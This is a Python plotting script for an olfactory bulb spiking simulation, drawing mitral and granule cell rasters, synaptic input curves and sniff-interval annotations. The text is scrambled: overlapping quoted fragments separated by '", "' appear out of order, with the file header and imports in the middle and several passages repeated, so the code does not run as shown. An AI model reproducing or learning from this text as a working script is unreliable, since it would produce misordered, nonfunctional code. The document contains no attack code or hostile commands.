numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = []", "schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk'))", "ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data", "(ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral", "y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b", "raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0 for i in", "utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author: - \"\"\"", "= os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim", "\\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright,", "syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\", "interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\",", "read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([])", "\\ draw=False) 
coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx", "in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 =", "[9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2)", "import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import", "sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref,", "neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import spiketrain from params", ") syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break", "draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright',", "ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes", "from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1,", "marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def", "draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output", "raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]],", "\\ backgroundcolor='white') break # Mark amplitude interval span = 
syn_ax.annotate('', xy=(1190, 1.28), xycoords='data',", "verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28),", "numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225])", "EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for", "= -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color,", ") sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width,", "mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4)", "pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import spiketrain", "dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma", "in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents()", "\\ color=color, linewidth=0.) 
# Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc],", "= int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx +=", "ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 #", "= gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\", "\\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio =", "ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color,", "cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)):", "in breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] +=", "sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'],", "= synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in", "color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9],", "comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ 
color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o',", "xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\", "numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for m in", "for i in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red')", "span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2)", "draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx =", "bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt =", "M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20,", "syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto", "= syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)',", "ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks)", "delays = read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0", "sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('',", "for 
breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim)", "syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event',", "arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark", "fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an", "data = [] for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1])", "draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'],", "'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]]", "= syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'],", "ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--',", "# Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events =", "gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^',", "\\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\", "int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += 
EXP[:-dtidx]*wts[pair[1]][idx] idx += 1", "and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7],", "cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc,", "# Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.):", "= numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for m", "synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids:", "mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for", "horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if breath_events[i] >", "xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21,", "raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx +=", "= 0 # for i in mask_a: # if i == 1: #", "numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx", "draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir", "syn_ax = fig.add_axes([.1,.45,.8,.225]) 
draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') #", "for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in", "= schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)',", "'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for m in M:", "[0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg", "# Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.)", ".102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i", "syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff", "color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos =", "= fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax,", "interval for i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2,", "+= EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue')", "= wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20", "x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = 
numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\", "loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in", "cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc =", "# idx += 1 idx = 0 for i in mask_b: if i", "dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx", "# -*- coding: utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011", "xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def", "(10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax =", "wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc =", "\\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\", "nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts =", "sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3)", "break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft", "\\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) 
# Glom ax.plot([xloc], [9], color=color,", "ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents():", "#raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11)", ".28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 -", "in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx", "schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes", "pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0],", "syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215,", "ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt'))", "ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)):", "mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx +=", 
"sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False)", "syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure,", "= numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color,", "ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def", "sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp,", "ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for", "pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red')", "wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc =", "1 idx = 0 for i in mask_b: if i == 1: if", "= pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax,", "- \"\"\" import os import numpy from matplotlib import pyplot from neuronpy.graphics import", "raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') 
pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline')", "if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\", "sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\", "format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot(", "raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02,", "transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position()", "= numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b", "b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx =", "xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp(", "import spikeplot from bulbspikes import * from neuronpy.util import spiketrain from params import", "color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws", "marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', 
fontsize=11) raster_ax.set_yticks([])", "xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff", "textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center',", "b in breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:]", "data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)):", "arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\", "[9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc],", "color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes =", "syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes", "'+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)):", "1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval", "color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90]", "= read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1] x =", "read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt)", "= 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = 
numpy.zeros(tstop/dt) y1 =", "xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width,", "yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec", "i in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') #", "Created on Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os import", "# Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color)", "breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim)", "color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt,", "idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath", "os import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes", "= fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze", "xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%',", "1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55", "xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay", "sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() 
